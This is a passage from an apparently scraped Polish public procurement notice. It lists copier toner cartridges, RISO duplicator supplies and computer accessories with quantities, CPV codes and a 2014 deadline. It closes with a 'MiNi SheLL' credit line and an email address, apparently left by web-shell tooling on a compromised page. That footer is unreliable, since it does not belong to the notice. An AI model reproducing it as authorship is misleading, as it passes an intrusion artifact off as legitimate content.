wydajność: 26 800 stron (5% pokrycie)	6
12	Wkład barwiący, yellow, do kserokopiarki
Toshiba e-Studio 2040c,
wydajność: 26 800 stron (5% pokrycie)	6
13	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5012, 
wydajność: 25 000 stron (5% pokrycie)	5
14	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5015N, 
wydajność: 16 000 stron (5% pokrycie)	4
15	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5316, 
wydajność: 16 000 stron (5% pokrycie)	4
16	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5316E, 
wydajność: 16 000 stron (5% pokrycie)	4
17	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5415, 
wydajność: 25 000 stron (5% pokrycie)	5
18	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5516 N, 
wydajność: 16 000 stron (5% pokrycie)	4
19	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5618 N, 
wydajność: 33 000 stron (5% pokrycie)	4
20	Wkład barwiący, czarny, do kserokopiarki 
Sharp AR 5625, 
wydajność: 33 000 stron (5% pokrycie)	4
21	Wkład barwiący, czarny, do kserokopiarki 
Sharp MX - B 200, 
wydajność: 8000 stron (5% pokrycie)	3

Powielacze do rysografu
L.p.	Urządzenie	Ilość
1	Farba czarna, do rysografu RISO EZ 200, opakowanie 2 x 1000ml.	4 op.
2	Matryca A 4, do rysografu RISO EZ 200, pokrycie 295 matryc	8 szt.







Akcesoria komputerowe
L.p.	Nazwa produktu	Ilość/szt.
1.		Kabel USB łączący telefon Samsung GT-S 5610 z komputerem	2
2.		Listwa zasilająco filtrująca : typ gniazda wyjściowego: Euro, liczba gniazd wyjściowych: 5 szt., długość przewodu zasilającego: 5m	10
3.		Klawiatura komputerowa bezprzewodowa - port USB Kompatybilna z systemami operacyjnymi Windows XP/Vista/7, komplet baterii	25
4.		Mysz komputerowa bezprzewodowa - port USB Kompatybilna z systemami operacyjnymi Windows XP/Vista/7, komplet baterii	25
5.		Kaseta czyszcząca do stramera cleaning cartrige HP DLTV C7998A	2
6.		Preparat służący do usuwania etykiet samoprzylepnych z powierzchni szklanych, metalowych oraz plastiku, opakowanie 400ml.	5
7.		Pendrive, szybka pamięć masowa, możliwość zabezpieczenia hasłem, kompatybilny z Windows, 8 GB	10
8.		Sprężone powietrze do czyszczenia sprzętu informatycznego w opakowaniach o pojemności 400 ml.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.12.51.00-2, 30.12.14.00-7, 30.19.21.13-6, 30.23.72.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com